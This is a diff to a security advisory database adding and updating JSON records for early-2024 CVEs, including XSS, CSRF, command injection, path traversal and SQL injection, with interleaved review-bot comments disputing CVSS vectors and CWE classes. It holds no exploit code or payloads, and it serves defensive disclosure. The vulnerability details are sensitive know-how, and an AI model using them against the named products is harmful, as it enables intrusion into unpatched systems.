+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1022"
+ },
+ {
+ "type": "WEB",
+ "url": "https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252291"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252291"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T23:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-pg22-9hrc-63jf/GHSA-pg22-9hrc-63jf.json b/advisories/unreviewed/2024/01/GHSA-pg22-9hrc-63jf/GHSA-pg22-9hrc-63jf.json
new file mode 100644
index 0000000000000..c310071460233
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-pg22-9hrc-63jf/GHSA-pg22-9hrc-63jf.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pg22-9hrc-63jf",
+ "modified": "2024-01-31T15:30:20Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2024-22285"
+ ],
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in Elise Bosse Frontpage Manager.This issue affects Frontpage Manager: from n/a through 1.3.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22285"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/frontpage-manager/wordpress-frontpage-manager-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T13:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json b/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json
index 37d3baf46c611..a03d4d0dc0f05 100644
--- a/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json
+++ b/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20971"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0003/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json b/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json
index a7bdc031897e8..98a03ad20a09f 100644
--- a/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json
+++ b/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pgcw-8wrq-74f3",
- "modified": "2024-01-23T18:31:11Z",
+ "modified": "2024-01-30T00:30:29Z",
 "published": "2024-01-23T18:31:11Z",
 "aliases": [
 "CVE-2023-45889"
 ],
 "details": "A Universal Cross Site Scripting (UXSS) vulnerability in ClassLink OneClick Extension through 10.8 allows remote attackers to inject JavaScript into any webpage. NOTE: this issue exists because of an incomplete fix for CVE-2022-48612.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T18:15:18Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-phf3-25c6-93hv/GHSA-phf3-25c6-93hv.json b/advisories/unreviewed/2024/01/GHSA-phf3-25c6-93hv/GHSA-phf3-25c6-93hv.json
new file mode 100644
index 0000000000000..aec7cba3b377d
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-phf3-25c6-93hv/GHSA-phf3-25c6-93hv.json
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phf3-25c6-93hv", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-6258" + ], + "details": "A security vulnerability has been identified in the pkcs11-provider, which is associated with Public-Key Cryptography Standards (PKCS#11). If exploited successfully, this vulnerability could result in a Bleichenbacher-like security flaw, potentially enabling a side-channel attack on PKCS#1 1.5 decryption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6258" + }, + { + "type": "WEB", + "url": "https://github.com/latchset/pkcs11-provider/pull/308" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251062" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1300", + "CWE-203" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json b/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json index 14afa6e46921b..bece97c20d954 100644 --- a/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json +++ b/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json 
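Review bot: `CWE-1300` in `cwe_ids` is the wrong class for this bug — it denotes improper protection of physical side channels, whereas the details describe a Bleichenbacher-style timing oracle on PKCS#1 v1.5 decryption, which `CWE-203` already covers (`CWE-208`, observable timing discrepancy, would be the more specific companion). The vector `C:H/I:H/A:H` also looks hard to reconcile with a decryption oracle, and the opencryptoki entry for the same attack class elsewhere in this diff (GHSA-qghg-5fph-q28c) is scored `C:H/I:N/A:N`, so one of the two records should be revisited for consistency. The only fix reference is pull request #308 with no fixed release named, so consumers cannot tell which pkcs11-provider version closes the issue. Minor: the details should read `PKCS#1 v1.5`, not `PKCS#1 1.5`.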
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-phwp-w9r4-qjpx", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-02T21:31:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2024-22545" ], "details": "TRENDnet TEW-824DRU version 1.04b01 is vulnerable to Command Injection via the system.ntp.server in the sub_420AE0() function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T08:15:42Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pj8j-f4gx-wrgf/GHSA-pj8j-f4gx-wrgf.json b/advisories/unreviewed/2024/01/GHSA-pj8j-f4gx-wrgf/GHSA-pj8j-f4gx-wrgf.json new file mode 100644 index 0000000000000..5c3ddd3bd664a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pj8j-f4gx-wrgf/GHSA-pj8j-f4gx-wrgf.json 
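Review bot: The `AV:L` in the added vector looks inconsistent with the details, which place the injection in the `system.ntp.server` configuration value — a setting that on a router is normally reachable through the management interface, which would argue for an adjacent or network attack vector; confirm against the source before relying on the resulting HIGH rating. `CWE-77` is acceptable, but if the sink is a shell invocation, `CWE-78` is the more precise class. The record as shown names no fixed firmware version, so readers should assume 1.04b01 is unpatched until the vendor says otherwise.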
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj8j-f4gx-wrgf", + "modified": "2024-01-31T03:30:30Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2023-2439" + ], + "details": "The UserPro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'userpro' shortcode in versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2439" + }, + { + "type": "WEB", + "url": "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21cb424c-4efd-4c12-a08a-6d574f118c28?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pjmm-vvvh-7xfj/GHSA-pjmm-vvvh-7xfj.json b/advisories/unreviewed/2024/01/GHSA-pjmm-vvvh-7xfj/GHSA-pjmm-vvvh-7xfj.json new file mode 100644 index 0000000000000..375d570d35190 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pjmm-vvvh-7xfj/GHSA-pjmm-vvvh-7xfj.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjmm-vvvh-7xfj", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22310" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Formzu Inc. Formzu WP allows Stored XSS.This issue affects Formzu WP: from n/a through 1.6.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22310" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json b/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json index 2545dc14e0b1c..4e2f34f40a474 100644 --- a/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json +++ b/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ppwj-j5xp-6rmh", - "modified": "2024-01-26T06:30:30Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T06:30:30Z", "aliases": [ "CVE-2023-38319" ], "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the FAS key entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T05:15:12Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json b/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json index 5536f42eb9519..729f9db8db513 100644 --- a/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json +++ b/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pqh2-qcg3-9x62", - "modified": "2024-01-25T21:32:14Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T21:32:14Z", "aliases": [ "CVE-2023-41474" ], "details": "Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-22" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T20:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pqpm-xc7w-528j/GHSA-pqpm-xc7w-528j.json b/advisories/unreviewed/2024/01/GHSA-pqpm-xc7w-528j/GHSA-pqpm-xc7w-528j.json new file mode 100644 index 0000000000000..50eefc80d13de --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pqpm-xc7w-528j/GHSA-pqpm-xc7w-528j.json 
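Review bot: The `CRITICAL` label (derived from the `AV:N/AC:L/PR:N/UI:N` vector added in the previous hunk) does not match the details, which say exploitation requires direct or indirect access to the configuration file — a precondition that normally maps to `PR:H` or at least `PR:L`, giving a HIGH rather than CRITICAL score. If the vector is kept as-is, a sentence explaining how an unauthenticated network attacker reaches the FAS key entry would help consumers triage. `CWE-78` is the right class for the described OS command execution.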
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqpm-xc7w-528j", + "modified": "2024-01-31T18:31:25Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-0219" + ], + "details": "In Telerik JustDecompile versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik JustDecompile install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0219" + }, + { + "type": "WEB", + "url": "https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability" + }, + { + "type": "WEB", + "url": "https://www.telerik.com/products/decompiler.aspx" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json b/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json index d11376d4f5dc9..a28b60af79221 100644 --- a/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json +++ b/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json b/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json index 0fa83a84c5434..48e423de06a1c 100644 
--- a/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json +++ b/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pvh3-5rhh-wcg5", - "modified": "2024-01-18T00:30:17Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-18T00:30:17Z", "aliases": [ "CVE-2023-6340" ], "details": "SonicWall Capture Client version 3.7.10, NetExtender client version 10.2.337 and earlier versions are installed with sfpmonitor.sys driver. The driver has been found to be vulnerable to Denial-of-Service (DoS) caused by Stack-based Buffer Overflow vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,10 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-18T00:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json b/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json index 88a93800a86b3..fd90cc26061c8 100644 --- a/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json +++ b/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20983" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0009/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json b/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json index 36a34b2d1b334..54f4459501b65 100644 --- a/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json 
+++ b/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pw8j-6xcp-c453", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0750" ], "details": "A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pwgf-w5vm-vm95/GHSA-pwgf-w5vm-vm95.json b/advisories/unreviewed/2024/01/GHSA-pwgf-w5vm-vm95/GHSA-pwgf-w5vm-vm95.json new file mode 100644 index 0000000000000..8e0e4f5cf751b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pwgf-w5vm-vm95/GHSA-pwgf-w5vm-vm95.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwgf-w5vm-vm95", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4552" + ], + "details": "Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows Probe System Files.\n\nAn authenticated AppBuilder user with the ability to create or manage existing databases can leverage them to exploit the AppBuilder server - including access to its local file system.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4552" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pwq2-rpq6-5x8x/GHSA-pwq2-rpq6-5x8x.json b/advisories/unreviewed/2024/01/GHSA-pwq2-rpq6-5x8x/GHSA-pwq2-rpq6-5x8x.json new file mode 100644 index 0000000000000..66232a842f9ae --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pwq2-rpq6-5x8x/GHSA-pwq2-rpq6-5x8x.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwq2-rpq6-5x8x", + "modified": "2024-01-30T03:30:30Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-1024" + ], + "details": "A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. This vulnerability affects unknown code of the component New Account Handler. The manipulation of the argument First Name/Last Name with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252292.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1024" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252292" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-px84-gp9q-g6w9/GHSA-px84-gp9q-g6w9.json b/advisories/unreviewed/2024/01/GHSA-px84-gp9q-g6w9/GHSA-px84-gp9q-g6w9.json new file mode 100644 index 0000000000000..4cb2b67079b31 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-px84-gp9q-g6w9/GHSA-px84-gp9q-g6w9.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px84-gp9q-g6w9", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-22523" + ], + "details": "Directory Traversal vulnerability in Qiyu iFair version 23.8_ad0 and before, allows remote attackers to obtain sensitive information via uploadimage component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22523" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/for82/vdzwqe/sc8ictw8poo8v5gl" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json b/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json index f982583601151..56b3b9c51dd54 100644 --- a/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json +++ b/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q37p-g696-qhwm", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T15:30:19Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2021-42142" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers mishandle the early use of a large epoch number. This vulnerability allows remote attackers to cause a denial of service and false-positive packet drops.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json b/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json index baf0c0824d602..89bea21f2b8b4 100644 --- a/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json +++ b/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://support.apple.com/en-us/HT213941" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-q6vx-6v63-ffqp/GHSA-q6vx-6v63-ffqp.json b/advisories/unreviewed/2024/01/GHSA-q6vx-6v63-ffqp/GHSA-q6vx-6v63-ffqp.json new file mode 100644 index 0000000000000..f1d112286e2b1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-q6vx-6v63-ffqp/GHSA-q6vx-6v63-ffqp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6vx-6v63-ffqp", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24140" + ], + "details": "Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.'", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24140" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/Daily_Habit_Tracker_App_SQL_Injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file 
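Review bot: `CRITICAL` overstates this issue: the details describe a denial of service and false-positive packet drops, which is an availability impact only, yet the vector added in the previous hunk is `C:H/I:H/A:H`. Unless the mishandled epoch number also lets an attacker read or inject DTLS records — nothing in the record says so — `C:N/I:N/A:H` (7.5 HIGH) would match the description. The affected range is also given only as "through master branch 53a0d97" with no fixed commit, so downstream users have no way to determine whether a given tinyDTLS checkout is patched.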
